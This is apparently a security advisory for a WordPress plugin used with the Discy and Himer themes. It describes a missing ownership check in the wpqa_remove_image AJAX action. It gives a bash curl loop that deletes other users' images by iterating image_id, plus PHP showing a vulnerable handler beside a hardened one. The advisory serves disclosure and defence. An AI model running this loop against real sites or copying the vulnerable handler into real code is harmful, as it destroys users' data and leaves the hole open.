The plugin, used as a companion plugin for the Discy and Himer themes, does not validate that the value passed to the image_id parameter of the wpqa_remove_image AJAX action belongs to the requesting user. The nonce sent in the wpqa_remove_image field only ties the request to a logged-in session; it does not establish ownership of the image. Any authenticated user, with privileges as low as Subscriber, can therefore delete the profile picture of any other user, for example by iterating over image_id values as in the proof of concept below.
#!/bin/bash
# Proof of concept: as a low-privileged (Subscriber) user, walk through attachment IDs
# and ask the plugin to delete each one. The nonce and Cookie come from the
# attacker's own logged-in session; the server never checks that image_id is ours.
nonce=aae369a8e3

for i in {1..100000}; do
  curl 'https://vulnerable.website/wp-admin/admin-ajax.php' \
    -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
    -H 'X-Requested-With: XMLHttpRequest' \
    -H 'Cookie: something=something' \
    --data-raw 'action=wpqa_remove_image&wpqa_remove_image='"$nonce"'&image_name=you_avatar&image_type=user_meta&meta_id=6723&image_id='"$i"
done
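The missing check, shown as an added illustration that is not the plugin's code: a handler in the vulnerable shape, which deletes whatever attachment ID the client names once the nonce passes, beside a hardened handler that only deletes the attachment recorded in the requesting user's own profile meta. The hook names, the nonce action string (taken from the field name in the proof of concept) and the user-meta key example_avatar_id are assumptions for the example.

```php
<?php
// Added illustration of the missing-ownership-check bug class; not the plugin's code.
// Assumed: the nonce action 'wpqa_remove_image' is carried in the POST field of the
// same name (as in the proof of concept), and the user-meta key 'example_avatar_id'
// holds the attachment ID of the user's current profile picture.

// Vulnerable shape: nonce and login are checked, ownership is not. The nonce only
// proves the request came from a page rendered for *some* logged-in user, so a
// Subscriber can submit any image_id and delete another user's attachment.
add_action( 'wp_ajax_example_remove_image_vulnerable', 'example_remove_image_vulnerable' );
function example_remove_image_vulnerable() {
    check_ajax_referer( 'wpqa_remove_image', 'wpqa_remove_image' );
    $image_id = absint( $_POST['image_id'] ?? 0 );
    wp_delete_attachment( $image_id, true );   // any attachment, any owner
    wp_send_json_success();
}

// Hardened shape: the server decides which attachment the caller may remove by
// looking it up in the caller's own meta. The client-supplied image_id is only
// compared against that record, never used on its own to pick the target, and
// image_name / image_type / meta_id from the request are ignored entirely.
add_action( 'wp_ajax_example_remove_image_hardened', 'example_remove_image_hardened' );
function example_remove_image_hardened() {
    check_ajax_referer( 'wpqa_remove_image', 'wpqa_remove_image' );

    $user_id = get_current_user_id();
    if ( ! $user_id ) {
        wp_send_json_error( 'login required', 401 );   // dies
    }

    $requested = absint( $_POST['image_id'] ?? 0 );
    $owned     = absint( get_user_meta( $user_id, 'example_avatar_id', true ) );

    // Ownership check: the only image this action may delete for this user is
    // the one recorded against their own account. Any mismatch is refused.
    if ( 0 === $owned || $requested !== $owned ) {
        wp_send_json_error( 'not your image', 403 );   // dies
    }

    // Defense in depth: make sure the stored ID still points at an attachment
    // before deleting it, so a stale or tampered meta value cannot remove a
    // post of another type.
    $post = get_post( $owned );
    if ( ! $post || 'attachment' !== $post->post_type ) {
        wp_send_json_error( 'no such image', 404 );    // dies
    }

    wp_delete_attachment( $owned, true );
    delete_user_meta( $user_id, 'example_avatar_id' );
    wp_send_json_success();
}
```

The hardened handler anchors authorization on the server-side record of which attachment belongs to the caller rather than on a capability check alone: a Subscriber has no delete_posts capability in a default WordPress install, so current_user_can( 'delete_post', $id ) would reject the legitimate owner as well as the attacker, whereas the meta lookup distinguishes the two.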
Binit Ghimire
Yes
2022-04-21
2022-04-21
2022-04-22